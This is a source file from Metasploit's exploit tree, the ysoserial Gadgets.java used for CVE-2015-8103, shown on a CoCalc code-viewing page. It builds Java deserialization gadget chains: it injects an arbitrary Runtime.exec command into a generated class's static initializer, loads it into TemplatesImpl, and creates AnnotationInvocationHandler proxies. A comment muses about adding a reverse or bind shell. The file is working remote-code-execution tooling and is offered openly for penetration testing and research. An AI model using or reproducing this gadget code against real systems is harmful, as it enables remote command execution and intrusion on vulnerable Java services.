CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2015-8103/payloads/util/Gadgets.java
Views: 11789
1
package ysoserial.payloads.util;

2


3
import java.io.Serializable;

4
import java.lang.reflect.Array;

5
import java.lang.reflect.InvocationHandler;

6
import java.lang.reflect.Proxy;

7
import java.util.HashMap;

8
import java.util.Map;

9


10
import javassist.ClassClassPath;

11
import javassist.ClassPool;

12
import javassist.CtClass;

13


14
import com.sun.org.apache.xalan.internal.xsltc.DOM;

15
import com.sun.org.apache.xalan.internal.xsltc.TransletException;

16
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

17
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

18
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

19
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

20
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

21


22
/*

23
 * utility generator functions for common jdk-only gadgets

24
 */

25
@SuppressWarnings("restriction")

26
public class Gadgets {

27
	private static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";	

28
	

29
	public static class StubTransletPayload extends AbstractTranslet implements Serializable {

30
		private static final long serialVersionUID = -5971610431559700674L;

31


32
		public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}

33


34
		@Override

35
		public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}	

36
	}

37


38
	// required to make TemplatesImpl happy

39
	public static class Foo implements Serializable {

40
		private static final long serialVersionUID = 8207363842866235160L; 		

41
	}

42


43
	public static <T> T createMemoitizedProxy(final Map<String,Object> map, final Class<T> iface, 

44
		final Class<?> ... ifaces) throws Exception {	    

45
	    return createProxy(createMemoizedInvocationHandler(map), iface, ifaces);	    

46
	}

47


48
	public static InvocationHandler createMemoizedInvocationHandler(final Map<String, Object> map) throws Exception {

49
		return (InvocationHandler) Reflections.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);

50
	}

51
	

52
	public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?> ... ifaces) {

53
		final Class<?>[] allIfaces = (Class<?>[]) Array.newInstance(Class.class, ifaces.length + 1);

54
		allIfaces[0] = iface;

55
		if (ifaces.length > 0) {

56
			System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length);	

57
		}		

58
		return iface.cast(Proxy.newProxyInstance(Gadgets.class.getClassLoader(), allIfaces , ih));

59
	}

60


61
	public static Map<String,Object> createMap(final String key, final Object val) {

62
		final Map<String,Object> map = new HashMap<String, Object>();

63
		map.put(key,val);

64
		return map;

65
	}

66


67
	public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {

68
		final TemplatesImpl templates = new TemplatesImpl();		

69
		

70
		// use template gadget class

71
		ClassPool pool = ClassPool.getDefault();

72
		pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));

73
		final CtClass clazz = pool.get(StubTransletPayload.class.getName());

74
		// run command in static initializer

75
		// TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections

76
		clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");

77
		// sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)

78
		clazz.setName("ysoserial.Pwner" + System.nanoTime());		

79
		

80
		final byte[] classBytes = clazz.toBytecode();

81
		

82
		// inject class bytes into instance

83
		Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {

84
			classBytes,

85
			ClassFiles.classAsBytes(Foo.class)});

86
		

87
		// required to make TemplatesImpl happy

88
		Reflections.setFieldValue(templates, "_name", "Pwnr"); 			

89
		Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());

90
		return templates;

91
	}

92
}

93


94